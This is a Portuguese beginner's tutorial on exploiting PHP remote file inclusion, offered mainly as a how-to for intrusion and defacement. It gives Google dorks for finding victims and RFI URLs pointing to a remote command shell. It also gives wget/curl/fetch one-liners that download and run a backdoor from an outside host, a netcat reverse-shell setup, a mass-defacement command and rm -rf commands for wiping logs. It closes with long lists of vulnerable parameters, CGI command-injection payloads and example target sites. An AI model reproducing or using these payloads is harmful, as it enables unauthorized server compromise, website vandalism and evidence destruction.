Tutorial completo de php injection para INICIANTES


Tutorial desenvolvido pelo tRavessO


1) Introdução

Já que muita gente pede ajuda sobre php injection, resolvi fazer 
um tutorial de simples entendimento pra facilitar a vida da galera new. 
Esta falha consiste em usuários incluirem scripts no codigo php da 
vitima e este ser executado. Quando corretamente utilizado, que é o que 
explicarei nesse tutorial, o intruso pode setar comandos ao servidor.
Boa parte do processo pode ser feito pelo próprio browser (IE, 
mozilla, netscape...).
Tentarei explicar como procura, explora e corrige o bug. Espero 
ser util para todos ;)

Obs1.: Este tutorial foi feito para explicar uma das maneiras utilizadas 
por pessoas para desfigurar sites mas pode ser utlizado para outros fins. 
Vai da cabeça de cada um :P

Obs2.: No final, terão urls com os programas citados.



2) O que é o que

Vitima : Site que você irá explorar a falha de php.
String : Arquivos no site suceptiveis ao ataque.
Cmd : Script em PHP que nos possibilita digitar 
comandos a serem incluidos no php.
Backdoor : Abre portas no sistema para conexão remota 'sem 
autenticação'.
Connect Back : Abre uma porta especifica para conexao entre seu 
pc e a vitima.
Exploit : Programa que explora certa falha num sistema. 
Há vários tipos de Exploits. Aqui, iremos 
tratar apenas com Local Root Exploits. (exploram 
falhas localmente que levam usuários comuns a 
acesso root - super-usuário -)
Shell : É um programa interpretador de comandos que 
permite ao usuário iteragir com o sistema 
operacional através de comandos digitados.
Telnet : Utilizaremos para conexões remotas.
Firewall : É uma barreira inteligente entre uma rede local
e a Internet, através da qual só passa tráfego 
autorizado. Este tráfego é examinado pelo 
firewall em tempo real e a seleção é feita de 
acordo com a regra."o que não foi expressamente
permitido, é proibido"
root : Super-usuário. É o admin... tem acesso total ao
sistema.



------------------- No browser


3) Strings

Há várias strings disponíveis. Neste tutorial, irei utilizar para 
exemplos uma bem simples que é " index.php?page= ". Em anexo, no final, 
várias outras :P



4) Sintaxe

Ex.:
www.site.com /index.php?page= http://CMD/cmd.gif?&cmd= ls

^ ^ ^ ^
Vitima String CmD comando unix

P.S.: Sem os espaços.



5) Procurando site vulnerável.

Uma excelente ferramente para os kiddies, sem dúvida, é o google. 
Há várias maneiras de fazer buscas por ele, dentre elas:

Obs.: A palavra 'word' q irei citar aqui é qualquer coisa que você esteja 
procurando no sistema de busca.

word : Busca por sites q contenham a 'word' em qualquer 
lugar da pagina.
allinurl: : Sites que contenham na url a word citada. Ex: 
www.site.com/forum/word.php?id=0 .
allintitle: : Restringe sua pesquisa ao título da página. 
intitle: : Parecido com o de cima, para maiores 
esclarecimentos no final do tuto.
inanchor: : Busca nos links dentro co corpo dos sites. <a 
href="PROCURA AQUI DENTRO">
site: : Procura sites de um determinado domínio. Ex: 
site:br <- procura sites .br
link: : Sites que contenham links para um outro 
determinado site. Ex: link:www.securityfocus.com
filetype: : Filtra por extensões de arquivos. Ex: 
filetype:php <- procura apenas urls .php

Essas dicas devem ser uteis não apenas na busca de sites 
vulneraveis, mas também nas buscas comuns para você ;)

Utilizando a string "index.php?page=" para sites .gov -->
allinurl:index.php?page= site:gov

Fácil..
.
Você também pode usar um scanner pra tornar o processo mais 
eficiente. kieger (membro do r00t_System grouP) codou um em perl: 
Procura com o sistema do google, testa e imprime os vulneraveis num 
arquivo. Código no final do tutorial.



6) Utilizando a CmD

6.1) Incluindo

Cmd = http://xpl.netmisphere2.com/0000-CMDS/cse.gif?&cmd=id


No resultado, insira a cmd na string. Ex:
www.site.com/index.php?page=http://xpl.netmisphere2.com/0000-CMDS/cse.gif?&cmd=id

Não tem mistério.

6.2) A Cmd

datacha0s - PHP Command/Safemode Exploit
System Information

sysname: --> Sistema operacional rodando.
nodename: --> Nome local.
release: --> Versão do kernel.
Script Current User: --> Usuário pelo qual o script está sendo executado.
PHP Version: --> Versão do php da máquina
User Info: --> Informação do user (uid, euid, gid).
Current Path: --> Pasta atual que você está no server.
Server IP: --> Ip do servidor.
Web Server: --> Informações sobre o servidor.


[*] Command Mode Run
Command Stdout

(( aqui ficarao os resultados dos comandos ))
(( inseridos na cmd )) 


Obs.: O script varia de cmd a cmd. Este é apenas um exemplo.



7) Ganhando acesso à shell


Para os próximos passos, você precisa estar na shell 
(interpretador de comandos) da máquina. Para isto, explicarei duas 
maneiras de tornar isto possível: Backdoor e Connect Back. 

7.1) Rodando backdoor no server para conexão remota

Para rodar um backdoor, basta fazer um upload, escolher 
permissões, e executá-lo. 

Comando: cd /var/tmp;wget www.site.onde.está.o.backdoor.com/backd
oor;chmod 777 backdoor;./backdoor

cd /var/tmp -> Faz a operação nesta pasta, por ser comum a 
todos os usuários e devido às suas permissões. 
/tmp tb serve :)

wget www.(...)/backdoor -> Copia o backdoor a partir de uma url para o 
site. Quando wget não funcionar, tente outros 
comandos. Sintaxes:

wget www.site.com/arquivo
lynx -source www.site.com/arquivo > arquivo
curl -o arquivo www.site.com/arquivo
GET www.site.com/arquivo > arquivo
(...)


wget
digite --->
cd /tmp;wget http://xpl.netmisphere2.com/r0nin;chmod 777 r0nin;./r0nin


quando a Shell soh aceita GET -
digite ---> 
cd /tmp;GET http://xpl.netmisphere2.com/r0nin > r0nin;chmod 777 r0nin;./r0nin

quando aceitar lynx -source 
digite --->
cd /tmp;lynx -source http://xpl.netmisphere2.com/r0nin > r0nin;chmod 777 r0nin;./r0nin

Quando aceitar curl -o
digite 
cd /tmp;curl -o bird http://xpl.netmisphere2.com/r0nin;chmod 777 r0nin;./r0nin

e quando o Kernel da Shell for
FreeBSD 

vc digita --->

cd /tmp;fetch http://xpl.netmisphere2.com/r0nin;chmod 777 r0nin;./r0nin



Após feito isso, aparecerá a seguinte mensagem:


	     ,--.     |    o      
	,-.-.|  |,---.|--- ..  ,  
	| | ||  ||    |    | ><   
	` ' '`--'`    `---'`'  `  

PsychoPhobia Backdoor v3 by m0rtix is starting...OK, pid = 14274
Shell on: 9997      User: wwwrun        UID: 30
Name: /sbin/syslogd  (Masked in PS! )  v: = Linux s106 2.6.5-7.151-default


Rootab !! use: expand_stack, Krad(if 2004) !
	     ,--.     |    o      
	,-.-.|  |,---.|--- ..  ,  
	| | ||  ||    |    | ><   
	` ' '`--'`    `---'`'  `  

PsychoPhobia Backdoor v3 by m0rtix is starting...OK, pid = 14274
Shell on: 9997      User: wwwrun        UID: 30
Name: /sbin/syslogd  (Masked in PS! )  v: = Linux s106 2.6.5-7.151-default


Rootab !! use: expand_stack, Krad(if 2004) !

PORTA = 9997

Isto significa que o backdoor está rodando. 
Agora, basta conectar-se à shell. Como?

No Win: Iniciar -> Executar -> telnet www.site.com porta

Onde o www.site.com recebe o nome ou ip do site que você rodou o 
backdoor e porta é a porta que o backdoor está trabalhando.

Se aparecer no telnet bash-2.05b$ ou algo parecido, é porque 
funcionou! E você tem acesso à shell na máquina!
Se demorar um tempo e não cair na shell, confira o nome/ip do 
server.. se estiver correto, ele está rodando Firewall. E agora? 
simples, Connect Back. :P



7.2) Connect Back 


Método muito eficiente para ganhar shell numa máquina. Ganha shell 
reversamente.
Windows: Baixe o netcat para windows e no Prompt do MSDOS (na 
pasta que o nc se encontra), digite: nc -vv -l -p 15 , onde 15 
pode ser escolhido de acordo com sua preferência. Esta porta será a que 
realizará a conexão.

Agora, voltando para o browser, na cmd digite o seguinte comando:
cd /var/tmp;wget www.site.do.dc.com/dc;chmod 777 dc;./dc IP porta

cd /var/tmp -> Mesmo que para backdoor.
wget www.site.do.dc.com/dc -> | | | | , mas é logico, com o 
endereço da dc.
./dc IP porta -> onde IP é o SEU IP e porta é a porta 
que você escolheu no netcat.


Feito isso, se ocorrer tudo certo, aparecerá como resultado:

Connect Back Backdoor

[*] Dumping Arguments
[*] Resolving Host Name
[*] Connecting...
[*] Spawning Shell
[*] Detached

Isto significa que você se conectou na shell! ;) Agora, vá para o 
MSDOS e vamos para o próximo passo.

Se aparecer

Connect Back Backdoor

[*] Dumping Arguments
[*] Resolving Host Name
[*] Connecting...
[-] Unable to Connect

confira os dados (seu ip, porta, netcat, etc). Se insistir, sua 
rede não aceita este tipo de conexão. Tente outras portas (como 80, 22, 
15, etc).



---------------------------------- Na Shelll


8) Comandos básicos

Eu ia passar direto nessa parte, mas sei que muitos não conhecem 
os comandos unix. Então vamos conhecer alguns:

ls -> Lista arquivos. Pode ser combinado com -a (mostra 
ocultos) e -l (mostra detalhadamente). Ex: ls -la 
(mostra detalhadamente os arquivos, inclusive ocultos).
uname -a -> Mostra informações do sistema, como versão do kernel, 
nome, e outras coisas uteis. 
id -> Mostra sua id.
w -> Lista os usuários logados no momento.
cp -> Copia arquivos. Sintaxe: cp arquivo /destino/
mv -> Move arquivos. Sintexe: mv arquivo /destino/
rm -> Remove arquivos. Se combinado com -rf , remove todos 
os arquivos setados, inclusive pastas
mkdir -> Cria diretorio
rmdir -> Exclui diretorio
find -> Procura por arquivos/pastas. Ex: " find /etc -name 
httpd.conf " procura pelo httpd.conf na pasta /etc
pwd -> Mostra em que pasta você está localizado
cat -> Exibe o conteúdo de um arquivo na tela

head -> Exibe linhas do início do arquivo
tail -> || || || final do arquivo
ctrl+c -> Sai/killa um programa
ctrl+r -> Busca comando digitado no history do bash
ps -auxw -> Lista todos os processos do sistema
netstat -na -> Status da conexão
kill -9 -> Mata processo. Sintaxe: kill -9 PID DO PROCESSO
kill -HUP -> Reinicia processo. Sintaxe: kill -HUP ID DO PROCESSO
pico -> Editor de texto. Sintaxe: pico arquivo
vi -> | | vi arquivo


Salvando resultados em arquivos 
comando > /arquivo/onde/será/armazenado
Ex: ls /etc > /tmp/s.txt salva todo o resultado da listagem de 
/etc no arquivo /tmp/s.txt

Adicionando linhas em arquivos
echo ' linha ' >> /arquivo/onde/será/incluido

Descompactando arquivos (os mais comuns)
.tar -> tar xvf arquivo.tar
.tar.gz -> tar zxvf arquivo.tar.gz
.tar.bz2 -> tar jxvf arquivo.tar.bz2
.zip -> unzip arquivo.zip


Compactando arquivos (os mais comuns)
.tar -> tar cvf destino.tar ARQUIVO
.tar.gz -> tar cvf destino.tar ARQUIVO | gzip destino.tar
.tar.bz2 -> tar cvf destino.tar ARQUIVO | bzip2 destino.tar
.zip -> zip destino.zip ARQUIVO


Bom.. procure um tutorial de linux para maiores esclarecimentos :P 



9) Ganhando acesso root 

Para ganhar acesso root localmente numa máquina, vai depender 
muito. Você precisa de um exploit local e o sistema deve estar vulnerável.
Simples, basta baixar, escolher as permissões e executar.. assim 
como você faz com o backdoor.. mas isto você faz na shell.
Os mais comuns no momento são mremap , brk e kmod para kernel 
abaixo de 2.4.24
Se tudo ocorrer corretamente rootando a máquina, ao digitar o 
comando "id" você verá

bash-2.05b# id
uid=0(root) gid=0(root)



Pronto! Você é root! Divirta-se ;) 




-------------------------------- Corriginddo o bug



10) Correção

Maneira bem simples de corrigir o bug de php é editando o arquivo 
php.ini na pasta de configuração do seu apache e desabilitando as funções

system, exec, passthru, shell_exec

(...)
E, claro, sempre estar atento com novidades de security e 
manter-se atualizado :)))




-------------------------------- Fun for kkiddies


Bom, após ter root na máquina, pode-se fazer o que quiser :P Vai 
da criatividade e necessidade da pessoa. 

Para kiddies, com o objetivo de pinchar os sites, vamos lá 
entender como isso funciona. Melhor, vou tentar explicar como faz um mass 
defacement.



11) Lista dos sites hospedados no server

Bom, para defacement, essa parte é essencial: saber quais os sites 
que estão lá. Mas como?

11.1) httpd.conf

Geralmente os dados dos sites hospedados ficam neste arquivo. Para 
fazer uma listagem dos sites, basta digitar um comando que irá ler o 
arquivo httpd.conf e imprimir as linhas que contenham ServerName
(nome dos sites). (na pasta onde o httpd.conf se encontra)
cat httpd.conf | grep ServerName
(se estiverem neste arquivo mesmo, você pode salvar o resultado 
num arquivo - preferencialmente na pasta do site que você partiu - e fazer 
download)
cat /etc/httpd/conf/httpd.conf | grep ServerName
---->
Como? Bom, na CMD, digite pwd. Você verá o local onde você 
se encontra no servidor. Ex: /home/httpd/vhosts/nasa.gov/web/
Digamos que a url seja esta: http://nasa.gov/index.php?page=CMD
Então, se você jogar o resultado para /home/httpd/vhosts/nasa.gov/web
Este arquivo estará na raiz do site. Só digitar este comando:

cat httpd.conf | grep ServerName > /home/httpd/vhosts/nasa.gov/we
b/RESULTADO.txt
(apenas um exemplo)
Feito isso, http://nasa.gov/RESULTADO.txt e baixar a lista :P

<----

Agora, onde está isso? GERALMENTE nas pastas /etc/httpd/conf ou 
/etc/apache/conf mas varia muito e pode ser encontrado em outros 
locais. Uma maneira eficaz, porem demorada, de encontrar é fazendo uma 
busca completa pelo sitema. Comando:
find / -name httpd.conf
Isto imprime onde está o httpd.conf no servidor. Pode aparecer 
mais que um resultado, vá testando :P Só assim


11.2) Outras maneiras...

Se mesmo assim, não conseguir achar quais sites tem lá, procure 
formas alternativas. Infelizmente não tem como explicar pois em cada 
server há uma maneira. Exemplo:

Se na pasta onde os sites estão localizados, você listá-los e o 
resultado ja tiver o nome e domínio deles: ex: ls /home/httpd/vhosts
site.com
mtv.com.br
nasa.gov
whitehouse.gov
fuckbush.org
...etc

Outras vezes, se encontram num arquivo chamado 
confixxx_alguma_coisa ... não tem mágica. Vasculhe o server... 


12) Fazendo o bendito o mass defacement

Bom, primeiro, crie uma index que você queira que fique no lugar 
das outras. Feita ela, jogue para algum lugar que você possa fazer o 
upload pro server.
Há locais gratuitos que podem ser utilizados, como o 100free.com . 
Crie uma conta e jogue o index lá. Se quiser renomeá-lo pra .zip pra ficar 
sem propagandas, pode também :P

Agora, o final: trocar todas as outras pela sua. Simples, basta um 
comando para isso:

find /pasta/onde/estão/os/sites -name "index.*" -exec cp 
/onde/está/sua/index.html {} \;

Para saber onde estão os sites, só pwd na cmd. Ex: 
/home/httpd/vhosts/nasa.gov/web
Nota-se que todos os outros estão em /home/httpd/vhosts.

Faça o upload igual backdoor. wget http://suaindex.com/sua.index
Digamos que você fez para a pasta /tmp , então, o comando ficaria 
assim:

find /home/httpd/vhosts -name "index.*" -exec cp /tmp/index.html 
{} \;


Agora é só aguradar um pouco que todos os sites serão pinchados :P


Posts: www.Zone-H.org www.coredumped.org www.delta5.com.br


13) Apagando logs

Alguns comandos úteis para apagar logs:

rm -rf /var/log
rm -rf /var/adm
rm -rf /var/apache/log
rm -rf $HISTFILE
find / -name .bash_history -exec rm -rf {} \;
find / -name .bash_logout -exec rm -rf {} \;
find / -name log* -exec rm -rf {} \;
find / -name *.log -exec rm -rf {} \;




-------------------------------- The End 
Pronto, acho que é só isso.. Qualquer erro, só dizer pra que 
eu possa corrigir :D


Greetz pra tds do irc 

irc.undernet.org -j #Shellfull
irc.fullnetwork.org -j #Owned
irc.Gigachat.net -j #Owned


-------------------------------- Strings ccomuns

####################################################
Cmd's:
___________________________________________________
http://www.agatsuma.kit.net/blabla/vsf.vsf?&list=1&cmd=id
####################################################
.tar -> tar xvf arquivo.tar
find / -perm 777 -type d

login: 'or''='
senha: 'or''='
___________________________________________________
/alex_guestbook3/include/livre_include.php?no_connect=lol&chem_absolu=
/index.php?module=PostWrap&page=
/oneadmin/config.php?path[docroot]=
/b2-tools/gm-2-b2.php?b2inc=
/zentrack/index.php?configFile=
/pivot/modules/module_db.php?pivot_path=
/inc/header.php/step_one.php?server_inc=
/install/index.php?lng=../../include/main.inc&G_PATH=
/inc/pipe.php?HCL_path=
/include/write.php?dir=
/include/new-visitor.inc.php?lvc_include_dir= 
/includes/header.php?systempath=
/maillist/admin.php
/support/mailling/maillist/inc/initdb.php?absolute_path=
/coppercop/theme.php?THEME_DIR=
/becommunity/community/index.php?pageurl=
/shoutbox/expanded.php?conf=
/agendax/addevent.inc.php?agendax_path=
/myPHPCalendar/admin.php?cal_dir=
/zboard/zboard.php
/path_of_cpcommerce/_functions.php?prefix
/dotproject/modules/projects/addedit.php?root_dir= 
/dotproject/modules/projects/view.php?root_dir= 
/dotproject/modules/projects/vw_files.php?root_dir= 
/dotproject/modules/tasks/addedit.php?root_dir= 
/dotproject/modules/tasks/viewgantt.php?root_dir=
/My_eGallery/public/displayCategory.php?basepath=
/modules/My_eGallery/public/displayCategory.php?basepath=
/modules/4nAlbum/public/displayCategory.php?basepath=
/modules/coppermine/themes/default/theme.php?THEME_DIR=
/modules/coppermine/include/init.inc.php?CPG_M_DIR=
/modules/agendax/addevent.inc.php?agendax_path=
/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
/modules/mod_mainmenu.php?mosConfig_absolute_path=
/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=
/modules/Forums/admin/admin_styles.php?phpbb_root_path=
/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=
/shoutbox/expanded.php?conf=
/pivot/modules/module_db.php?pivot_path=
/library/editor/editor.php?root=
/library/lib.php?root=
/e107/e107_handlers/secure_img_render.php?p=
/db.php?path_local=
index.php?site=
index.php?url=
index.php?p=
index.php?openfile=
index.php?file=
index.php?go=
index.php?seite=
index.php?content=
index.php?side=
index.php?kobr=
index.php?pg=
index.php?doc=
index.php?l=
index.php?a=
index.php?pagina=
index.php?principal=
index.php?show=
index.php?opcao=
index.php?conteudo=
index.php?meio=
index.php?inc=
index.php?c=
index.php?rage=
index.php?arquivo=
principal.php?conteudo=
principal.php?arquivo=
principal.php?pagina=
principal.php?pg=
main.php?site=
template.php?pagina=
contenido.php?sec=
index_principal.php?pagina=
template.php?name=
forum.php?act=
home.php?action=
home.php?pagina=
noticias.php?arq=
main.php?x=
main.php?page=
default.php?page=
index.php?cont=
index.php?configFile=
index.php?meio.php=
index.php?include=
index.php?x=
index.php?open=
index.php?visualizar=
index.php?page=
index.php?pag=
index.php?cat=
index.php?action=
index.php?do=
index2.php?x=
index2.php?content=
main.php?pagina=
index.phpmain.php?x=
index.php?link=
index.php?canal=
index.php?screen=
index.php?langc=
services.php?page=
htmltonuke.php?filnavn=
/inc/step_one_tables.php?server_inc=
/GradeMap/index.php?page=
/phpshop/index.php?base_dir= 
/admin.php?cal_dir=
/path_of_cpcommerce/_functions.php?prefix=
/contacts.php?cal_dir=
/convert-date.php?cal_dir=
/album_portal.php?phpbb_root_path=
/mainfile.php?MAIN_PATH=
/dotproject/modules/files/index_table.php?root_dir=
/html/affich.php?base=
/gallery/init.php?HTTP_POST_VARS=
/pm/lib.inc.php?pm_path=
/ideabox/include.php?gorumDir=
/header.php?admin_root=
/eventcal2.php?path_simpnews=
/eventscroller.php?path_simpnews=
/gbpro/top.php?header=
/fusion/templates/headline_temp.php?nst_inc=
/expanded.php?conf=
/include/main.php?config[search_disp]=true&include_dir=
/yabbse/Sources/Packages.php?sourcedir=
/bbs/include/write.php?dir=
/zpanel/zpanel.php?page=
/votebox.php?VoteBoxPath=
/admin_styles.php?phpbb_root_path=
/getpage.php?page=/getpage.php?page=
/lib/static/header.php?set_menu=
/calendar/calendar.php?serverPath=
/calendar/functions/popup.php?serverPath=
/calendar/events/header.inc.php?serverPath=
/calendar/events/datePicker.php?serverPath=
/calendar/setup/setupSQL.php?serverPath=
/calendar/setup/header.inc.php?serverPath=
/calogic/cl_minical.php?CLPATH=
/calogic/clmcpreload.php?CLPATH=
/calogic/mcconfig.php?CLPATH=
/calogic/mcpi-demo.php?CLPATH=
/admin_modules/admin_module_captions.inc.php?config[path_src_include]=
/admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=
/admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=
/admin_modules/admin_module_edit.inc.php?config[path_src_include]=
/admin_modules/admin_module_delimage.inc.php?config[path_src_include]=
/admin_modules/admin_module_deldir.inc.php?config[path_src_include]=
/src/index_overview.inc.php?config[path_src_include]=
/src/image-gd.class.php?config[path_src_include]=
/src/image.class.php?config[path_src_include]=
/src/album.class.php?config[path_src_include]=
/src/show_random.inc.php?config[path_src_include]=
/src/main.inc.php?config[path_src_include]=
/src/index_passwd-admin.inc.php?admin_ok=1&config[path_admin_include]=
/xcomic/initialize.php?xcomicRootPath=
/xcomic/Xcomic.php?xcomicRootPath=
/xcomic/admin/admininitialize.php?xcomicRootPath=
/[path_to_squito]/photolist.inc.php?photoroot=
/[path-to-spid]/lang/lang.php?lang_path=
/inc/functions.inc.php?config[ppa_root_path]=
/phpSecurePages/secure.php?&cfgProgDir=
/ops/gals.php?news_file=
/gb/form.inc.php3?lang=
/nabopoll/survey.inc.php?path=
/ovidentia/index.php?babInstallPath=
/user_check.php?sitepath=
/last_gallery.php?YAPIG_PATH=
/mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=
/download/downloads.php?release_id=650&incdir=
/popper/childwindow.inc. php?form=
/clmcpreload.php?CLPATH=
/modernbill/samples/news.php?DIR=
/xtcommerce/admin/includes/classes/spaw/spaw_control.class.php?spaw_root=
/twiki/bin/view/Main/TWikiUsers?rev=2%20|id%00
/index.php?m=1&pag=
/PHPBlog/images/cmd.php?cmd=
/_vti_bin/shtml.exe?_vti_rpc
/_vti_bin/_vti_aut/author.dll
Admin.dll, Author.dll, e Shtml.dll
####################################################
4nalbum: allinurl:modules.php?name=4nAlbum
/modules/4nAlbum/public/displayCategory.php?basepath=

Yabbse: allinurl:/yabbse/
/yabbse/Sources/Packages.php?sourcedir=

WEBinsta Mailing Manager V1.3 allinurl:/mailling/maillist/
/inc/initdb.php?absolute_path=

My_eGallery: allinurl:modules.php?name=My_eGallery
/modules/My_eGallery/public/displayCategory.php?basepath=

Zeroboard: allinurl:/zboard/zboard.php
/include/write.php?dir=

fusion: allintitle:fusion:news:management:system
/templates/headline_temp.php?nst_inc=

osticket: allinurl:/osticket/
/include/main.php?config[search_disp]=true&include_dir=

coppermine: allinurl:modules.php?name=coppermine
/modules/coppermine/themes/default/theme.php?THEME_DIR=
/modules/coppermine/include/init.inc.php?CPG_M_DIR=

becommunity: allinurl:/becommunity/index.php
/becommunity/community/index.php?pageurl=
/becommunity/index.php?pageurl=

intitle:PHPOpenChat ext:php
http://www.site.com/phpopenchat/contrib/yabbse/poc.php?poc_root_path=http://attacker
http://www.site.com/phpopenchat/contrib/yabbse/poc.php?sourcedir=http://attacker

Como procurar: ( allintitle:iPhotoAlbum - Your Online Photo Album )
http://new.ro.com.ua/photoalb/lib/static/header.php?set_menu=http://attacker

Como procurar: ( "Squitosoft All Rights Reserved" )
http://cgi.easyinfo.at/bz/squito/photolist.inc.php?photoroot=cmd

Como procurar: ( allinurl:**/screens/displayimage.php?pid=* ) ou ( allinurl:**/screens/thumbnails.php?album=* ) ou ( allinurl:**/ppa/screens/* )
http://www.ppa.baiz.org/ppa/inc/functions.inc.php?config[ppa_root_path]=cmd
http://www.helix.baiz.org/ppa/inc/functions.inc.php?config[ppa_root_path]=cmd

Como procura: ( allinurl:**/spid.php ) ou ( allinurl:**/spid.php?cat=*lang=* )
http://www.vvmvc.nl/spid/lang/lang.php?lang_path=cmd
http://www.archeogate.it/spid/lang/lang.php?lang_path=cmd
http://mail.llcew.edu.hk/~rayy/spid/lang/lang.php?lang_path=cmd

Como procurar: ( "powered by siteframe" ) ou ( allinurl:*gob*/folder.php?id=* )
/classes.php?LOCAL_PATH=
http://www.ciudadano.gob.mx/coahuila/classes.php?LOCAL_PATH=http://secure.phila.gov/cse.gif?&cmd=id

allinurl:day.php?date=
/tools/send_reminders.php?includedir=
http://www.cmes.arizona.edu/calendar/tools/send_reminders.php?includedir=http://gigachat.net/tool.dat?&cmd=id

MODO DE PROCURA: "Powered by AutoLinks Pro"
al_initialize.php?alpath=http://www.foxcf.hpgvip.ig.com.br/cse.gif?&cmd=id

Como procurar: ( "Powered by runcms" inurl:*.ru ) ou ( allinurl:*br*/newbb_plus/* ) ou ( allintitle:Lokal V 2 ) ou ( "Powered by E-Xoopport" ) ou ( Powered by ExV2 Vers. ) ou ( allinurl:*it*/newbb_plus/viewtopic.php?topic_id=*forum=* ) ou ( allinurl:*.it*/newbb/print.php?forum=*topic_id=* ) ou ( allinurl:*.br*/news/archive.php?op=*year=*month=* )
/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=

Mambo
Como procurar: ( "Powered by Mambo" inurl:*gov* ) ou ( allinurl:*.br/index.php?option=com_content ) ou ( allinurl:*gov*/component/option,com_contact/Itemid,*/ )
index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=

PHPFanBase
Como procurar: ( "Powered by: PHPFanBase" inurl:*br* ) ou ( inurl:*.br/members.php?id=all ) ou ( "Powered by: PHPCalendar" ) ou ( "Powered by: PHPCurrently" ) ou ( "Powered by: PHPClique" ) ou ( "Powered by: PHPQuotes" ) 
protection.php?action=logout&siteurl=

AllMyGuests
Como procurar: ( Nuke ET Copyright © 2004 por Truzone. ) ou ( allinurl:*.edu.*/modules.php?name=allmyguests ) ou ( "powered by AllMyGuests" inurl:*br* )
modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

Lite Mambo
Como procurar: ( "Site powered By Limbo CMS" )
index2.php?includes_dir=

Pivot
Como procurar: ( "powered by pivot" ) ou ( allinurl:*br*/entry.php?id=*#* ) ou( allinurl:*de*/*.php?c=*w=*t=* ) ou ( "powered by pivot" inurl:**/archive*.php ) ou ( "powered by pivot" inurl:**/entry.php?id=* )extensions/moblog/moblog_lib.php?basedir=
extensions/moblog/moblog_lib.php?basedir=

#### XMLRPC - BUGS #####

by phpmyfaq
powered by phpwebsite
powered by postnuke
includedby phpMyFAQ
powered+by+phpMyFAQ
Serendipity Weblog (serendipity_xmlrpc.php)
Drupal (xmlrpc.php)
TikiWiki (xmlrpc.php)
phpMyFAQ (xmlrpcs.php)
phpAdsNew (adxmlrpc.php)
phpwebsite (rpc.php)
php-wiki (utils.php)
Wordpress (xmlrpc.php)
index.php?gadget= (blogxmlrpc.php)

####################################################
Cgi e arquivos pl que permitem defacer, como awstats
ikonboard, etc..
Acumuladas pelo unknown - unknown_br@linuxmail.org
___________________________________________________
/cgi-bin/index.cgi?page=|uname%20-a;id|
/cgi-bin/awstats.pl?update=1&logfile=|id|
/cgi-bin/awstats/awstats.pl?configdir=|echo%20;echo%20;uname%20-a;id;uptime;pwd;echo%20;echo%20|
/cgi-bin/ikonboard.cgi
/cgi-bin/acart/acart.pl?&page=|uname%20-a;pwd;id|
/cgi-bin/quikstore.cgi?category=|id| 
/cgi-bin/ubb/ubb.cgi?g=uname -a
/cgi-bin/hinsts.pl?|id;uname$IFS-a|                     
/cgi-bin/bp/bp-lib.pl?g=uname -a                   
/ccbill/whereami.cgi?g=ls
/cgi-bin/telnet.cgi                                   
/cgi-bin/1/cmd.cgi
/calendar.pl?command=login&fromTemplate=|uname%20-a;id;pwd| 
/encore/forumcgi/display.cgi?preftemp=temp&page=anonymous&file=|uname -a| 
/cgi-sys/guestbook.cgi?user=cpanel&template=|id| 
/events.cgi?t=|id| 
/powerup.cgi?a=latest&t=|id| 
/lc.cgi?a=|id| 
/news.cgi?a=114&t=|id| 
/biznews.cgi?a=33&t=|id| 
/jobs.cgi?a=9&t=|id| 
/articles.cgi?a=34&t=|id| 
/events.cgi?a=155&t=|id| 
/latinbitz.cgi?t=|id| 
/newsdesk.cgi?t=|id| 
/media.cgi?a=11&t=|id| 
/reporter.cgi?t=|id| 
/news.cgi?t=|id| 
/newsupdate.cgi?a=latest&t=|uname%20-a| 
/deportes.cgi?a=latest&t=|id| 
/news.cgi?a=latest&t=|uname%20-a| 
/biznews.cgi?a=33&t=|id| 
/whereami.cgi?g=id 
/auktion.pl?menue=|id|
/i-mall/i-mall.cgi?p=|id| 
/vote.pl?action=show&id=|id|
/shop.pl/page=|id|
/newsdesk.cgi?a=latest&t=|id|
/fileseek.cgi?head=&foot=|id|
/cgi-bin/probe.cgi?olddat=|id|
/emsgb/easymsgb.pl?print=|id|
/app/webeditor/login.cgi?username=&command=simple&do=edit&password=&file=|uname-a; id|
/csv_db/csv_db.cgi?fil e=file.extention|command|
/cgi-bin/jammail.pl?job=showoldmail&mail=|command|
/cgi-bin/bbs/read.cgi?file=|uname%20-a|&bbs_id=00001
/support_page.cgi?file_name=|command|
/cgi-bin/wwwnikki/wwwnikki.cgi?view=|uname%20-a;id;pwd|
http://[target]:3443/OvCgi/connectedNodes.ovpl?node=a|id|